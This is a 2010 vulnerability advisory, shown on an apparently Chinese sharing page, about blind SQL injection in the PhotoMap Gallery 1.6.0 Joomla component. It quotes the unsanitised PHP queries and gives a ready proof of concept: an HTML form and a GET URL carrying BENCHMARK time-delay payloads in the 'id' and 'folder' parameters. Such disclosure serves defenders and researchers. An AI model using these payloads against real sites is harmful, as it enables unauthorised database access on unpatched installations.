扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 |
PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection NamePhotoMap Gallery Vendorhttp://extensions.joomla.org/extensions/photos-a-images/photo-gallery/10658 Versions Affected 1.6.0 AuthorSalvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date2010-07-28 X. INDEX I.ABOUT THE APPLICATION II. DESCRIPTION III.ANALYSIS IV. SAMPLE CODE V.FIX I. ABOUT THE APPLICATION ________________________ PhotoMap Galleryisa gallerycomponentcompletely integratedintoJoomla 1.5.x. Like 'Picasa', 'Flickr', or 'Panoramio',youcaneasilyadd geo-tagsto your photossothatyou can remember exactly where they're from using Google Maps. II. DESCRIPTION _______________ Some parametersare not properly sanitised before being used in SQL queries. III. ANALYSIS _____________ Summary: A) Multiple Blind SQL Injection _______________________________ The parameter id passed to controller.phpvia POST when view is set to user and task is set to save_usercategory isnotproperly sanitisedbefore beingused in a SQL query. Thiscanbe exploited to manipulate SQL queries by injecting arbitrary SQL code. The parameter folder passed toimagehandler.phpis not properly sanitised before used in a SQL query.This can beexploitedtomanipulateSQLqueries by injecting arbitrary SQL code. The following is the affected code. controller.php (line 1135): function save_usercategory() { // Check for request forgeries JRequest::checkToken() or jexit( 'Invalid Token' ); $user = & JFactory::getUser(); $task = JRequest::getVar('task'); $post = JRequest::get('post'); //perform access checks $isNew = ($post['id']) ? false : true; // $catid = (int) JRequest::getVar('catid', 0); $db =& JFactory::getDBO(); $query = 'SELECT c.id, c.directory' . ' FROM #__g_categories AS c' . ' WHERE c.id = '.$post['id']; imagehandler.php (line 109); function getList() { static $list; // Only process the list once per request if (is_array($list)) { return $list; } // Get folder from request $folder = $this->getState('folder'); $search = $this->getState('search'); $query = 'SELECT *' . ' FROM #__g_categories' . ' WHERE id = '.$folder; IV. SAMPLE CODE _______________ A) Multiple Blind SQL Injection Replace 89eb36eca1919aff534b13b54796c9a4 with your own. <html> <head> <title>PoC - PhotoMap Gallery 1.6.0 Blind SQL Injection</title> </head> <body> <form method="POST" action="http://127.0.0.1/joomla/index.php"> <input type="hidden" name="89eb36eca1919aff534b13b54796c9a4" value="1"> <input type="hidden" name="option" value="com_photomapgallery"> <input type="hidden" name="controller" value=""> <input type="hidden" name="view" value="user"> <input type="hidden" name="task" value="save_usercategory"> <input type="hidden" name="id" value="-1 AND (SELECT(IF(0x41=0x41, BENCHMARK(99999999999,NULL),NULL)))"> <input type="submit"> </form> </body> </html> http://site/path/index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) V. FIX ______ No fix. |
体验盒子
